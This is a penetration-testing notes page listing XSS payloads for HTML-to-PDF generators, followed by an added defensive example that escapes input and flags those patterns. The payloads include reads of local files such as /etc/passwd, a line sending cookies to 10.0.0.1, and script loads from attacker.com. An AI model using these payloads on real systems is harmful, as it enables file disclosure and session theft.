Exploit Notes

XSS with Dynamic PDF

Last modified: 2023-02-21

XSS Web

If a PDF file generated somewhere on the website reflects our input, we can insert malicious code into it.

Exploitation

Insert the payload into the POST parameters.

Basic

<img src='x' onerror="document.write('test')">

<script>document.write('test')</script>

Path Disclosure

<img src='x' onerror="document.write(JSON.stringify(window.location))">

<script>document.write('<iframe src=\"' + window.location.href + '\"></iframe>')</script>

LFI/RFI

<iframe src="file:///etc/passwd"></iframe>
<iframe src=file:///etc/passwd width=1000px height=1000px></iframe>
<iframe src=file:///var/www/html/index.php width=1000px height=1000px></iframe>
<iframe src="http://localhost:3000/index.html"></iframe>

<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">
<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">

External Scripts

<script src="http://attacker.com/test.js"></script>

<img src='x' onerror="document.write('<script src=\"http://10.0.0.1/test.js\"></script>')" />
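
Every payload above only works when the POST parameter reaches the PDF generator as raw HTML. The following is an added example, not part of the original notes, showing the defensive side: each field is HTML-escaped at the point it is inserted into the document that gets rendered, and the payload classes listed on this page are flagged for logging. The function names (`escapeHtml`, `flagSuspicious`, `buildPdfHtml`), the table template and the sample field names are assumptions made for illustration.

```javascript
// Added example: neutralise user input before it reaches an HTML-to-PDF renderer.
// buildPdfHtml and its template are hypothetical, not taken from any specific product.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag, close an attribute or start an entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Patterns for the payload classes listed on this page, used for logging/alerting only.
// Escaping is the control; this list is not a filter and is not exhaustive.
const SUSPICIOUS = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'iframe-tag', re: /<\s*iframe\b/i },
  { name: 'event-handler', re: /\bon[a-z]+\s*=/i },
  { name: 'file-uri', re: /file:\/\//i },
  { name: 'document-write', re: /document\s*\.\s*write/i },
];

function flagSuspicious(value) {
  return SUSPICIOUS.filter((p) => p.re.test(String(value))).map((p) => p.name);
}

// Build the HTML handed to the PDF renderer; every key and value is escaped on insertion.
function buildPdfHtml(fields) {
  const rows = Object.entries(fields)
    .map(([k, v]) => `<tr><th>${escapeHtml(k)}</th><td>${escapeHtml(v)}</td></tr>`)
    .join('');
  return `<!doctype html><html><body><table>${rows}</table></body></html>`;
}

// Constructed sample input reusing two payloads from this page plus one benign value.
const sampleFields = {
  name: `<img src='x' onerror="document.write('test')">`,
  note: `<iframe src="file:///etc/passwd"></iframe>`,
  city: 'Osaka',
};

const rendered = buildPdfHtml(sampleFields);
const findings = Object.fromEntries(
  Object.entries(sampleFields).map(([k, v]) => [k, flagSuspicious(v)])
);
console.log(rendered);
console.log(findings);
```

Escaping is the primary control. Where the renderer allows it, also disable script execution and local file access, since the `document.write` and `file://` payloads depend on them.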
